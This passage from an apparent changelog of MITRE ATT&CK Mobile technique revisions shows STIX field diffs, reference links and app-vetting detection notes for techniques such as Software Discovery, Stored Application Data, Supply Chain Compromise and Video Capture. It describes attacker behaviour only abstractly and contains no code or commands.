Computerworld-iPhoneCracking)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueKrebs-JuiceJacking
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.htmlhttp://krebsonsecurity.com/2011/08/beware-of-juice-jacking/
external_references[2]['source_name']Krebs-JuiceJackingGoogleProjectZero-OATmeal
external_references[2]['description']Brian Krebs. (2011, August 17). Beware of Juice-Jacking. Retrieved December 23, 2016.Jann Horn. (2018, September 10). OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB. Retrieved September 18, 2018.
external_references[2]['url']http://krebsonsecurity.com/2011/08/beware-of-juice-jacking/https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html
external_references[4]['source_name']IBM-NexusUSBComputerworld-iPhoneCracking
external_references[4]['description']Roee Hay. (2017, January 5). Android Vulnerabilities: Attacking Nexus 6 and 6P Custom Boot Modes. Retrieved January 11, 2017.Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved September 21, 2018.
external_references[4]['url']https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html
external_references[5]['source_name']GoogleProjectZero-OATmealIBM-NexusUSB
external_references[5]['description']Jann Horn. (2018, September 10). OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB. Retrieved September 18, 2018.Roee Hay. (2017, January 5). Android Vulnerabilities: Attacking Nexus 6 and 6P Custom Boot Modes. Retrieved January 11, 2017.
external_references[5]['url']https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.htmlhttps://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/
external_references[6]['source_name']Computerworld-iPhoneCrackingNIST Mobile Threat Catalogue
external_references[6]['url']https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.htmlhttps://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-1.html
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
kill_chain_phases{'kill_chain_name': 'mitre-mobile-attack', 'phase_name': 'lateral-movement'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html', 'external_id': 'PHY-2'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-6.html', 'external_id': 'STA-6'}

[T1418] Software Discovery

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may seek to identify all applications installed t1Adversaries may attempt to get a listing of applications tha
>on the device. One use case for doing so is to identify the >t are installed on a device. Adversaries may use the informa
>presence of endpoint security applications that may increase>tion from [Software Discovery](https://attack.mitre.org/tech
> the adversary's risk of detection. Another use case is to i>niques/T1418) during automated discovery to shape follow-on 
>dentify the presence of applications that the adversary may >behaviors, including whether or not to fully infect the targ
>wish to target.  On Android, applications can use methods in>et and/or attempts specific actions.      Adversaries may at
> the PackageManager class (Citation: Android-PackageManager)>tempt to enumerate applications for a variety of reasons, su
> to enumerate other apps installed on device, or an entity w>ch as figuring out what security measures are present or to 
>ith shell access can use the pm command line tool.  On iOS, >identify the presence of target applications. 
>apps can use private API calls to obtain a list of other app 
>s installed on the device. (Citation: Kurtz-MaliciousiOSApps 
>) However, use of private API calls will likely prevent the  
>application from being distributed through Apple's App Store 
>. 

New Mitigations:

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionApplication vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAPP-12
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1021
external_referencesAndroid. (n.d.). PackageManager. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-03-30 20:41:40.719000+00:00
nameApplication DiscoverySoftware Discovery
descriptionAdversaries may seek to identify all applications installed on the device. One use case for doing so is to identify the presence of endpoint security applications that may increase the adversary's risk of detection. Another use case is to identify the presence of applications that the adversary may wish to target. On Android, applications can use methods in the PackageManager class (Citation: Android-PackageManager) to enumerate other apps installed on device, or an entity with shell access can use the pm command line tool. On iOS, apps can use private API calls to obtain a list of other apps installed on the device. (Citation: Kurtz-MaliciousiOSApps) However, use of private API calls will likely prevent the application from being distributed through Apple's App Store.Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions. Adversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications.
kill_chain_phases[0]['phase_name']defense-evasiondiscovery
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']Android-PackageManagerNIST Mobile Threat Catalogue
external_references[1]['url']https://developer.android.com/reference/android/content/pm/PackageManager.htmlhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html
x_mitre_version1.02.0
iterable_item_removed
STIX FieldOld valueNew Value
kill_chain_phases{'kill_chain_name': 'mitre-mobile-attack', 'phase_name': 'discovery'}
external_references{'source_name': 'Kurtz-MaliciousiOSApps', 'description': 'Andreas Kurtz. (2014, September 18). Malicious iOS Apps. Retrieved December 21, 2016.', 'url': 'https://andreas-kurtz.de/2014/09/malicious-ios-apps/'}

[T1409] Stored Application Data

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1Adversaries may access and collect application data residentt1Adversaries may try to access and collect application data r
> on the device. Adversaries often target popular application>esident on the device. Adversaries often target popular appl
>s such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus >ications, such as Facebook, WeChat, and Gmail.(Citation: SWB
>March 2019)  This technique requires either escalated privil> Exodus March 2019)      Due to mobile OS sandboxing, this t
>eges or for the targeted app to have stored the data in an i>echnique is only possible in three scenarios:      * An appl
>nsecure manner (e.g., with insecure file permissions or in a>ication stores files in unprotected external storage  * An a
>n insecure location such as an external storage directory).>pplication stores files in its internal storage directory wi
 >th insecure permissions (e.g. 777)  * The adversary gains ro
 >ot permissions on the device 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesSecurity Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.
external_referencesAUT-0
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1012
external_referencesAUT-0
external_referencesSecurity Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.
values_changed
STIX FieldOld valueNew Value
modified2019-10-10 14:17:48.920000+00:002022-04-11 19:41:54.022000+00:00
nameAccess Stored Application DataStored Application Data
descriptionAdversaries may access and collect application data resident on the device. Adversaries often target popular applications such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019) This technique requires either escalated privileges or for the targeted app to have stored the data in an insecure manner (e.g., with insecure file permissions or in an insecure location such as an external storage directory).Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019) Due to mobile OS sandboxing, this technique is only possible in three scenarios: * An application stores files in unprotected external storage * An application stores files in its internal storage directory with insecure permissions (e.g. 777) * The adversary gains root permissions on the device
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueSWB Exodus March 2019
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.htmlhttps://securitywithoutborders.org/blog/2019/03/29/exodus.html
external_references[2]['source_name']SWB Exodus March 2019NIST Mobile Threat Catalogue
external_references[2]['url']https://securitywithoutborders.org/blog/2019/03/29/exodus.htmlhttps://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html
x_mitre_detectionAccessing stored application data can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.
x_mitre_version2.03.0
iterable_item_removed
STIX FieldOld valueNew Value
kill_chain_phases{'kill_chain_name': 'mitre-mobile-attack', 'phase_name': 'credential-access'}

[T1474] Supply Chain Compromise

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1As further described in [Supply Chain Compromise](https://att1Adversaries may manipulate products or product delivery mech
>tack.mitre.org/techniques/T1195), supply chain compromise is>anisms prior to receipt by a final consumer for the purpose 
> the manipulation of products or product delivery mechanisms>of data or system compromise.  Supply chain compromise can t
> prior to receipt by a final consumer for the purpose of dat>ake place at any stage of the supply chain including:  * Man
>a or system compromise. Somewhat related, adversaries could >ipulation of development tools * Manipulation of a developme
>also identify and exploit inadvertently present vulnerabilit>nt environment * Manipulation of source code repositories (p
>ies. In many cases, it may be difficult to be certain whethe>ublic or private) * Manipulation of source code in open-sour
>r exploitable functionality is due to malicious intent or si>ce dependencies * Manipulation of software update/distributi
>mply inadvertent mistake.  Third-party libraries incorporate>on mechanisms * Compromised/infected system images * Replace
>d into mobile apps could contain malicious behavior, privacy>ment of legitimate software with modified versions * Sales o
>-invasive behavior, or exploitable vulnerabilities. An adver>f modified/counterfeit products to legitimate distributors *
>sary could deliberately insert malicious behavior or could e> Shipment interdiction  While supply chain compromise can im
>xploit inadvertent vulnerabilities. For example, security is>pact any component of hardware or software, attackers lookin
>sues have previously been identified in third-party advertis>g to gain execution have often focused on malicious addition
>ing libraries incorporated into apps.(Citation: NowSecure-Re>s to legitimate software in software distribution or update 
>moteCode)(Citation: Grace-Advertisement).>channels. Targeting may be specific to a desired victim set 
 >or malicious software may be distributed to a broad set of c
 >onsumers but only move on to additional tactics on specific 
 >victims.  Popular open source projects that are used as depe
 >ndencies in many applications may also be targeted as a mean
 >s to add malicious code to users of the dependency, specific
 >ally with the widespread usage of third-party advertising li
 >braries.(Citation: Grace-Advertisement)(Citation: NowSecure-
 >RemoteCode)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesM. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016.
external_referencesAPP-6
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1077
external_referencesAPP-6
external_referencesM. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016.
values_changed
STIX FieldOld valueNew Value
modified2021-03-10 21:06:37.536000+00:002022-03-28 19:41:56.018000+00:00
descriptionAs further described in [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Somewhat related, adversaries could also identify and exploit inadvertently present vulnerabilities. In many cases, it may be difficult to be certain whether exploitable functionality is due to malicious intent or simply inadvertent mistake. Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities. For example, security issues have previously been identified in third-party advertising libraries incorporated into apps.(Citation: NowSecure-RemoteCode)(Citation: Grace-Advertisement).Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency, specifically with the widespread usage of third-party advertising libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueGrace-Advertisement
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.htmlhttps://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf
external_references[3]['source_name']Grace-AdvertisementNIST Mobile Threat Catalogue
external_references[3]['url']https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdfhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html
x_mitre_detection* Insecure third-party libraries could be detected by application vetting techniques. For example, Google's [App Security Improvement Program](https://developer.android.com/google/play/asi) detects the use of third-party libraries with known vulnerabilities within Android apps submitted to the Google Play Store. * Malicious software development tools could be detected by enterprises deploying integrity checking software to the computers that they use to develop code to detect presence of unauthorized, modified software development tools.Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html', 'external_id': 'SPC-0'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html', 'external_id': 'SPC-1'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html', 'external_id': 'SPC-2'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html', 'external_id': 'SPC-3'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html', 'external_id': 'SPC-4'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html', 'external_id': 'SPC-5'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html', 'external_id': 'SPC-6'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html', 'external_id': 'SPC-7'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html', 'external_id': 'SPC-8'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html', 'external_id': 'SPC-9'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html', 'external_id': 'SPC-10'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html', 'external_id': 'SPC-11'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html', 'external_id': 'SPC-12'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html', 'external_id': 'SPC-13'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-14.html', 'external_id': 'SPC-14'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html', 'external_id': 'SPC-15'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html', 'external_id': 'SPC-16'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html', 'external_id': 'SPC-17'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html', 'external_id': 'SPC-18'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-19.html', 'external_id': 'SPC-19'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html', 'external_id': 'SPC-20'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html', 'external_id': 'SPC-21'}

[T1512] Video Capture

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may utilize the camera to capture information abt1An adversary can leverage a device’s cameras to gather infor
>out the user, their surroundings, or other physical identifi>mation by capturing video recordings. Images may also be cap
>ers. Adversaries may use the physical camera devices on a mo>tured, potentially in specified intervals, in lieu of video 
>bile device to capture images or video. By default, in Andro>files.       Malware or scripts may interact with the device
>id and iOS, an application must request permission to access> cameras through an available API provided by the operating 
> a camera device which is granted by the user through a requ>system. Video or image files may be written to disk and exfi
>est prompt. In Android, applications must hold the `android.>ltrated later. This technique differs from [Screen Capture](
>permission.CAMERA` permission to access the camera. In iOS, >https://attack.mitre.org/techniques/T1513) due to use of the
>applications must include the `NSCameraUsageDescription` key> device’s cameras for video recording rather than capturing 
> in the `Info.plist` file, and must request access to the ca>the victim’s screen.      In Android, an application must ho
>mera at runtime.>ld the `android.permission.CAMERA` permission to access the 
 >cameras. In iOS, applications must include the `NSCameraUsag
 >eDescription` key in the `Info.plist` file. In both cases, t
 >he user must grant permission to the requesting application 
 >to use the camera. If the device has been rooted or jailbrok
 >en, an adversary may be able to access the camera without kn
 >owledge of the user.  

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-09-12 18:33:15.023000+00:002022-04-08 15:58:43.813000+00:00
nameCapture CameraVideo Capture
descriptionAdversaries may utilize the camera to capture information about the user, their surroundings, or other physical identifiers. Adversaries may use the physical camera devices on a mobile device to capture images or video. By default, in Android and iOS, an application must request permission to access a camera device which is granted by the user through a request prompt. In Android, applications must hold the `android.permission.CAMERA` permission to access the camera. In iOS, applications must include the `NSCameraUsageDescription` key in the `Info.plist` file, and must request access to the camera at runtime.An adversary can leverage a device’s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files. Malware or scripts may interact with the device cameras through an available API provided by the operating system. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1513) due to use of the device’s cameras for video recording rather than capturing the victim’s screen. In Android, an application must hold the `android.permission.CAMERA` permission to access the cameras. In iOS, applications must include the `NSCameraUsageDescription` key in the `Info.plist` file. In both cases, the user must grant permission to the requesting application to use the camera. If the device has been rooted or jailbroken, an adversary may be able to access the camera without knowledge of the user.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_detectionOn Android and iOS, the user can view which applications have permission to use the camera through the device settings screen, and the user can choose to revoke the permissions.The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions. During the vetting process, applications using the Android permission `android.permission.CAMERA`, or the iOS `NSCameraUsageDescription` plist entry could be given closer scrutiny.
x_mitre_version1.02.0
Minor Version Changes

[T1517] Access Notifications

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1A malicious application can read notifications sent by the ot1Adversaries may collect data within notifications sent by th
>perating system or other applications, which may contain sen>e operating system or other applications. Notifications may 
>sitive data such as one-time authentication codes sent over >contain sensitive data such as one-time authentication codes
>SMS, email, or other mediums. A malicious application can al> sent over SMS, email, or other mediums. In the case of Cred
>so dismiss notifications to prevent the user from noticing t>ential Access, adversaries may attempt to intercept one-time
>hat the notifications arrived and can trigger action buttons> code sent to the device. Adversaries can also dismiss notif
> contained within notifications.(Citation: ESET 2FA Bypass)>ications to prevent the user from noticing that the notifica
 >tion has arrived and can trigger action buttons contained wi
 >thin notifications.(Citation: ESET 2FA Bypass) 

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Lukáš Štefanko, ESET']
values_changed
STIX FieldOld valueNew Value
modified2020-07-09 14:07:02.217000+00:002022-04-11 15:54:08.965000+00:00
descriptionA malicious application can read notifications sent by the operating system or other applications, which may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. A malicious application can also dismiss notifications to prevent the user from noticing that the notifications arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass)Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_detectionThe user can inspect (and modify) the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access).Application vetting services can look for applications requesting the `BIND_NOTIFICATION_LISTENER_SERVICE` permission in a service declaration. Users can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access).
x_mitre_version1.01.1

[T1437] Application Layer Protocol

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may communicate using a common, standardized appt1Adversaries may communicate using application layer protocol
>lication layer protocol such as HTTP, HTTPS, SMTP, or DNS to>s to avoid detection/network filtering by blending in with e
> avoid detection by blending in with existing traffic.  In t>xisting traffic. Commands to the mobile device, and often th
>he mobile environment, the Google Cloud Messaging (GCM; two->e results of those commands, will be embedded within the pro
>way) and Apple Push Notification Service (APNS; one-way serv>tocol traffic between the mobile device and server.   Advers
>er-to-device) are commonly used protocols on Android and iOS>aries may utilize many different protocols, including those 
> respectively that would blend in with routine device traffi>used for web browsing, transferring files, electronic mail, 
>c and are difficult for enterprises to inspect. Google repor>or DNS.
>tedly responds to reports of abuse by blocking access to GCM 
>.(Citation: Kaspersky-MobileMalware) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionAbuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1040
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:52:45.266000+00:002022-04-19 20:03:51.831000+00:00
nameStandard Application Layer ProtocolApplication Layer Protocol
descriptionAdversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. In the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. Google reportedly responds to reports of abuse by blocking access to GCM.(Citation: Kaspersky-MobileMalware)Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
kill_chain_phases{'kill_chain_name': 'mitre-mobile-attack', 'phase_name': 'exfiltration'}
external_references{'source_name': 'Kaspersky-MobileMalware', 'description': 'Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.', 'url': 'https://securelist.com/mobile-malware-evolution-2013/58335/'}

[T1471] Data Encrypted for Impact

Current version: 3.1

Version changed from: 3.0 → 3.1


Old Description
New Description
t1An adversary may encrypt files stored on the mobile device tt1An adversary may encrypt files stored on a mobile device to 
>o prevent the user from accessing them, for example with the>prevent the user from accessing them. This may be done in or
> intent of only unlocking access to the files after a ransom>der to extract monetary compensation from a victim in exchan
> is paid. Without escalated privileges, the adversary is gen>ge for decryption or a decryption key (ransomware) or to ren
>erally limited to only encrypting files in external/shared s>der data permanently inaccessible in cases where the key is 
>torage locations. This technique has been demonstrated on An>not saved or transmitted.
>droid. We are unaware of any demonstrated use on iOS. 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionApplication vetting services may be able to detect if an application attempts to encrypt files, although this may be benign behavior.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1074
values_changed
STIX FieldOld valueNew Value
modified2019-10-01 13:51:22.001000+00:002022-04-06 13:31:22.485000+00:00
descriptionAn adversary may encrypt files stored on the mobile device to prevent the user from accessing them, for example with the intent of only unlocking access to the files after a ransom is paid. Without escalated privileges, the adversary is generally limited to only encrypting files in external/shared storage locations. This technique has been demonstrated on Android. We are unaware of any demonstrated use on iOS.An adversary may encrypt files stored on a mobile device to prevent the user from accessing them. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version3.03.1

[T1533] Data from Local System

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Sensitive data can be collected from local system sources, st1Adversaries may search local system sources, such as file sy
>uch as the file system or databases of information residing >stems or local databases, to find files of interest and sens
>on the system.  Local system data includes information store>itive data prior to exfiltration.       Access to local syst
>d by the operating system. Access to local system data often>em data, which includes information stored by the operating 
> requires escalated privileges (e.g. root access). Examples >system, often requires escalated privileges. Examples of loc
>of local system data include authentication tokens, the devi>al system data include authentication tokens, the device key
>ce keyboard cache, Wi-Fi passwords, and photos.>board cache, Wi-Fi passwords, and photos. On Android, advers
 >aries may also attempt to access files from external storage
 > which may require additional storage-related permissions.  
 >  
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-10-11 14:53:38.987000+00:002022-04-01 16:53:27.576000+00:00
descriptionSensitive data can be collected from local system sources, such as the file system or databases of information residing on the system. Local system data includes information stored by the operating system. Access to local system data often requires escalated privileges (e.g. root access). Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos.Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration. Access to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html', 'external_id': 'STA-41'}

[T1407] Download New Code at Runtime

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1An app could download and execute dynamic code (not includedt1Adversaries may download and execute dynamic code not includ
> in the original application package) after installation to >ed in the original application package after installation. T
>evade static analysis techniques (and potentially dynamic an>his technique is primarily used to evade static analysis che
